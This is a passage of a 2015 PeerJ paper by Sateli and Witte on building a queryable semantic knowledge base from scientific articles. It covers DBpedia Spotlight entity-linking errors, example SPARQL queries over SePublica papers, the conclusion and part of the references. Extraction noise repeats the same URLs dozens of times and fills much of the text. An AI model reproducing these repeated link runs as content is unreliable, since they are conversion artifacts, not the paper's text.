to the LOD, we randomly chose 20–50 entities per document from the SePublica corpus and manually evaluated whether they are connected to their correct sense in the DBpedia knowledge base, by inspecting their URIs through a Web browser. Out of the 120 entities manually inspected, 82 of the entities had their correct semantics in the DBpedia knowledge base. Overall, this results in 68% accuracy, which confirms our hypothesis that LOD knowledge bases are useful for the semantic description of entities in scientific documents. Our error analysis of the detected named entities showed that Spotlight was often unable to resolve entities to their correct resource (sense) in the DBpedia knowledge base. Spotlight was also frequently unable to resolve acronyms to their full names. For example, Spotlight detected the correct sense for the term “Information Extraction,” while the term “(IE)” appearing right next to it was resolved to “Internet Explorer” instead. By design, this is exactly how the Spotlight disambiguation mechanism works: popular terms have higher chances to be connected to their surface forms. We inspected their corresponding articles on Wikipedia and discovered that the Wikipedia article on Internet Explorer is significantly longer than the Information Extraction wiki page and has 20 times more inline links, which shows its prominence in the DBpedia knowledge base, at the time of writing. Consequently, this shows that tools like Spotlight that have been trained on the general domain or news articles are biased towards topics that are more popular, which is not necessarily the best strategy for scientific publications. APPLICATION We published the populated knowledge base described in the previous section using the Jena Fuseki 2.017 server that provides a RESTful endpoint for SPARQL queries. We now 17 Jena Fuseki, http://jena.apache.org/ documentation/serving data/ Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 20/27 https://peerj.com/computer-science/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://jena.apache.org/documentation/serving_data/ http://dx.doi.org/10.7717/peerj-cs.37 Table 5 Three example Contributions from papers obtained through a SPARQL query. The rows of the table show the paper ID and the Contribution sentence extracted from the user’s corpus. Paper ID Contribution SePublica2011/paper-05.xml “This position paper discusses how research publication would benefit of an infrastructure for evaluation entities that could be used to support documenting research efforts (e.g., in papers or blogs), analysing these efforts, and building upon them.” SePublica2012/paper-03.xml “In this paper, we describe our attempts to take a commodity publication environment, and modify it to bring in some of the formality required from academic publishing.” SePublica2013/paper-05.xml “We address the problem of identifying relations between semantic annotations and their relevance for the connectivity between related manuscripts.” show how the extracted knowledge can be exploited to support a user in her tasks. As a running example, let us imagine a use case: a user wants to write a literature review from a given set of documents about a specific topic. Scenario 1. A user obtained the SePublica proceedings from the web. Before reading each article thoroughly, she would like to obtain a summary of the contributions of all articles, so she can decide which articles are relevant to her task. Ordinarily, our user would have to read all of the retrieved documents in order to evaluate their relevance—a cumbersome and time-consuming task. However, using our approach the user can directly query for the rhetorical type that she needs from the system (note: the prefixes used in the queries in this section can be resolved using Table 1): SELECT ?paper ?content WHERE { ?paper pubo:hasAnnotation ?rhetoricalEntity . ?rhetoricalEntity rdf:type sro:Contribution . ?rhetoricalEntity cnt:chars ?content } ORDER BY ?paper The system will then show the query’s results in a suitable format, like the one shown in Table 5, which dramatically reduces the amount of information that the user is exposed to, compared to a manual triage approach. Retrieving document sentences by their rhetorical type still returns REs that may concern entities that are irrelevant or less interesting for our user in her literature review task. Ideally, the system should return only those REs that mention user-specified topics. Since we model both the REs and NEs that appear within their boundaries, the system can allow the user to further stipulate her request. Consider the following scenario: Scenario 2. From the set of downloaded articles, the user would like to find only those articles that have a contribution mentioning ‘linked data’. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 21/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Table 6 Two example Contributions about ‘linked data’. The results shown in the table are Contribu- tion sentences that contain an entity described by <dbpedia:Linked data>. Paper ID Contribution SePublica2012/paper-07.xml “We present two real-life use cases in the fields of chemistry and biology and outline a general methodology for transforming research data into Linked Data.” SePublica2014/paper-01.xml “In this paper we present a vision for having such data available as Linked Open Data (LOD), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers.” Similar to Scenario 1, the system will answer the user’s request by executing the following query against its knowledge base: SELECT DISTINCT ?paper ?content WHERE { ?paper pubo:hasAnnotation ?rhetoricalEntity . ?rhetoricalEntity rdf:type sro:Contribution . ?rhetoricalEntity pubo:containsNE ?ne. ?ne rdfs:isDefinedBy dbpedia:Linked data . ?rhetoricalEntity cnt:chars ?content } ORDER BY ?paper The results returned by the system, partially shown in Table 6, are especially interesting. The query not only retrieved parts of articles that the user would be interested in reading, but it also inferred that “Linked Open Data,” “Linked Data” and “LOD” named entities have the same semantics, since the DBpedia knowledge base declares an <owl:sameAs> relationship between the aforementioned entities: A full-text search on the papers, on the other hand, would not have found such a semantic relation between the entities. So far, we showed how we can make use of the LOD-linked entities to retrieve articles of interest for a user. Note that this query returns only those articles with REs that contain an NE with a URI exactly matching that of dbpedia:Linked data. However, by virtue of traversing the LOD cloud using an NE’s URI, we can expand the query to ask for contributions that involve dbpedia:Linked data or any of its related subjects. In our experiment, we interpret relatedness as being under the same category in the DBpedia knowledge base (see Fig. 8). Consider the scenario below: Scenario 3. The user would like to find only those articles that have a contribution mention- ing topics related to ‘linked data’. The system can respond to the user’s request in three steps: (i) First, through a federated query to the DBpedia knowledge base, we find the category that dbpedia:Linked data has been assigned to—in this case, the DBpedia knowledge base returns “Semantic web,” “Data management,” and “World wide web” as the categories; (ii) Then, we retrieve all other subjects which are under the same identified categories (cf. Fig. 8); (iii) Finally, for each related entity, we look for rhetorical entities in the knowledge base that mention the Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 22/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Figure 8 Finding semantically related entities in the DBpedia ontology: The Linked data and Con- trolled vocabulary entities in the DBpedia knowledge base are assumed to be semantically related to each other, since they are both contained under the same category, i.e., Semantic Web. related named entities within their boundaries. The semantically expanded query is shown below: SELECT ?paper ?content WHERE { SERVICE <http://dbpedia.org/sparql> { dbpedia:Linked data <http://purl.org/dc/terms/subject> ?category . ?subject <http://purl.org/dc/terms/subject> ?category . } ?paper pubo:hasAnnotation ?rhetoricalEntity . ?rhetoricalEntity rdf:type sro:Contribution . ?rhetoricalEntity pubo:containsNE ?ne. ?ne rdfs:isDefinedBy ?subject . ?rhetoricalEntity cnt:chars ?content } ORDER BY ?paper The system will return the results, shown in Table 7, to the user. This way, the user receives more results from the knowledge base that cover a wider range of topics semantically related to linked data, without having to explicitly define their semantic relatedness to the system. This simple example is a demonstration of how we can exploit the wealth of knowledge available in the LOD cloud. Of course, numerous other queries now become possible on scientific papers, by exploiting other linked open data sources. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 23/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Table 7 The results from the extended query that show Contribution sentences that mention a named entity semantically related to <dbpedia:Linked data>. Paper ID Contribution SePublica2012/paper-01.xml “In this paper, we propose a model to specify workflow-centric research objects, and show how the model can be grounded using semantic technologies and existing vocabularies, in particular the Object Reuse and Exchange (ORE) model and the Annotation Ontology (AO).” SePublica2014/paper-01.xml “In this paper we present a vision for having such data available as Linked Open Data (LOD), and we argue that this is only possible and for the mutual benefit in cooperation between researchers and publishers.” SePublica2014/paper-05.xml “In this paper we present two ontologies, i.e., BiRO and C4O, that allow users to describe bibliographic references in an accurate way, and we introduce REnhancer, a proof-of-concept implementation of a converter that takes as input a raw-text list of references and produces an RDF dataset according to the BiRO and C4O ontologies.” SePublica2014/paper-07.xml “We propose to use the CiTO ontology for describing the rhetoric of the citations (in this way we can establish a network with other works).” CONCLUSION We all need better ways to manage the overwhelming amount of scientific literature available to us. Our approach is to create a semantic knowledge base that can supplement existing repositories, allowing users fine-grained access to documents based on querying LOD entities and their occurrence in rhetorical zones. We argue that by combining the concepts of REs and NEs, enhanced retrieval of documents becomes possible, e.g., finding all contributions on a specific topic or comparing the similarity of papers based on their REs. To demonstrate the feasibility of these ideas, we developed an NLP pipeline to fully automate the transformation of scientific documents from free-form content, read in isolation, into a queryable, semantic knowledge base. In future work, we plan to further improve both the NLP analysis and the LOD linking part of our approach. As our experiments showed, general-domain NE linking tools, like DBpedia Spotlight, are biased toward popular terms, rather than scientific entities. Here, we plan to investigate how we can adapt existing or develop new entity linking methods specifically for scientific literature. Finally, to support end users not familiar with semantic query languages, we plan to explore user interfaces and interaction patterns, e.g., based on our Zeeva semantic wiki (Sateli & Witte, 2014) system. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partially funded by an NSERC Discovery Grant. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 24/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.37 Grant Disclosures The following grant information was disclosed by the authors: NSERC Discovery Grant. Competing Interests The authors declare there are no competing interests. Author Contributions • Bahar Sateli and René Witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015- supplements. REFERENCES Berners-Lee T, Hendler J. 2001. Publishing on the semantic web. Nature 410(6832):1023–1024 DOI 10.1038/35074206. Blake C. 2010. Beyond genes, proteins, and abstracts: identifying scientific claims from full-text biomedical articles. Journal of Biomedical Informatics 43(2):173–189 DOI 10.1016/j.jbi.2009.11.001. Bontcheva K, Kieniewicz J, Andrews S, Wallis M. 2015. Semantic enrichment and search: a case study on environmental science literature. D-Lib Magazine 21(1):1 DOI 10.1045/january2015- bontcheva. Constantin A, Peroni S, Pettifer S, David S, Vitali F. 2015. The Document Components Ontology (DoCO). The Semantic Web Journal In Press. Available at http://www.semantic-web-journal.net/ system/files/swj1016 0.pdf. Cunningham H, Maynard D, Bontcheva K, Tablan V. 2002. GATE: a framework and graphical development environment for robust NLP tools and applications. In: Proceedings of the 40th anniversary meeting of the association for computational linguistics (ACL’02). Cunningham H, Maynard D, Bontcheva K, Tablan V, Aswani N, Roberts I, Gorrell G, Funk A, Roberts A, Damljanovic D, Heitz T, Greenwood MA, Saggion H, Petrak J, Li Y, Peters W. 2011. Text processing with GATE (Version 6). Sheffield: GATE. Daiber J, Jakob M, Hokamp C, Mendes PN. 2013. Improving efficiency and accuracy in multilingual entity extraction. In: Proceedings of the 9th international conference on semantic systems (I-Semantics). Available at http://jodaiber.github.io/doc/entity.pdf. Di Iorio A, Peroni S, Vitali F. 2009. Towards markup support for full GODDAGs and beyond: the EARMARK approach. In: Proceedings of Balisage: the markup conference. Available at http:// www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html. Groza T, Handschuh S, Möller K, Decker S. 2007a. SALT—semantically annotated LATEX for scientific publications. In: The semantic web: research and applications, LNCS. Berlin, Heidelberg: Springer, 518–532. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 25/27 https://peerj.com/computer-science/ http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj-2015-supplements http://dx.doi.org/10.1038/35074206 http://dx.doi.org/10.1016/j.jbi.2009.11.001 http://dx.doi.org/10.1045/january2015-bontcheva http://dx.doi.org/10.1045/january2015-bontcheva http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://www.semantic-web-journal.net/system/files/swj1016_0.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://jodaiber.github.io/doc/entity.pdf http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html 